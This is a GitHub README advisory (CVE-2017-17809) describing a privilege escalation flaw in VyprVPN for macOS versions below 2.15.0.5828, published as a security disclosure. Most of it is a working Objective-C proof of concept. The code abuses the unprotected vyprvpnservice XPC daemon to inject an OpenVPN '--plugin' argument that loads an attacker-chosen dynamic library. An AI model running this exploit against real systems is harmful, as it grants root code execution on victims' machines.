Skip to content

Latest commit

 

History

History
60 lines (54 loc) · 2.67 KB

README.md

File metadata and controls

60 lines (54 loc) · 2.67 KB

[VS-2017-007] VyprVPN for MacOS Privilege Escalation Vulnerability

Download: https://www.goldenfrog.com/vyprvpn
CVE: CVE-2017-17809
Author: Benjamin Watson of VerSprite Security
Affected: < 2.15.0.5828

Vulnerability Details

The VyprVPN's vyprvpnservice launch daemon has an unprotected XPC service that allows attackers to update the underlying OpenVPN configuration and the arguments passed to OpenVPN binary when executed. An attacker can abuse this vulnerability by forcing the VyprVPN application to load a malicious dynamic library every time a new connection is made.

Exploitation

PoC

// Make XPC connection
NSLog(@"[+] Connecting to vyprvpnservice [!]");
xpc_connection_t connection = xpc_connection_create_mach_service("vyprvpnservice", NULL, 0);
assert(connection);
NSLog(@"[+] Service connection successfull [!]");
// Set XPC event handler
xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {
    NSLog(@"[+] Received response from XPC service event handler [!]");
    char *description = xpc_copy_description(event);
    NSLog(@"[+] %s", description);
    free(description);
});
// Resume connection
xpc_connection_resume(connection);
// Build payload
NSLog(@"[+] Building XPC dictionary [!]");
xpc_object_t payload = xpc_dictionary_create(NULL, NULL, 0);
// {+} {"RequestedKey":"openvpn_additional_params","Value":"--plugin \/path\/to\/dylib","Action":"set"}
NSDictionary *dict = [[NSDictionary alloc] initWithObjectsAndKeys:@"openvpn_additional_params", 
              @"RequestedKey", 
              @"--plugin /Users/rotlogix/Development/Plugin/libPlugin", 
              @"Value", @"set", 
              @"Action", nil];
NSData *json = [NSJSONSerialization dataWithJSONObject:dict options:NSJSONWritingPrettyPrinted error:NULL];
xpc_dictionary_set_data(payload, "data", json.bytes, json.length);
NSLog(@"[+] XPC dictionary creation finished [!]");
// Send the XPC message
NSLog(@"[+] Sending XPC message with updated params --plugin /Users/rotlogix/Development/Plugin/libPlugin [!]");
xpc_connection_send_message_with_reply(connection, payload, NULL, ^(xpc_object_t event) {
    size_t dataLength;
    NSLog(@"[+] Received response from XPC service [!]");
    char *description = xpc_copy_description(event);
    NSLog(@"[+] %s", description);
    free(description);
    const void *returnData = xpc_dictionary_get_data(event, "data", &dataLength);
    NSData *myData = [NSData dataWithBytes:returnData length:dataLength];
    assert(myData);
    NSJSONSerialization *json = [NSJSONSerialization JSONObjectWithData:myData options:NSJSONReadingMutableLeaves error:NULL];
    NSLog(@"[+] %@", json );
});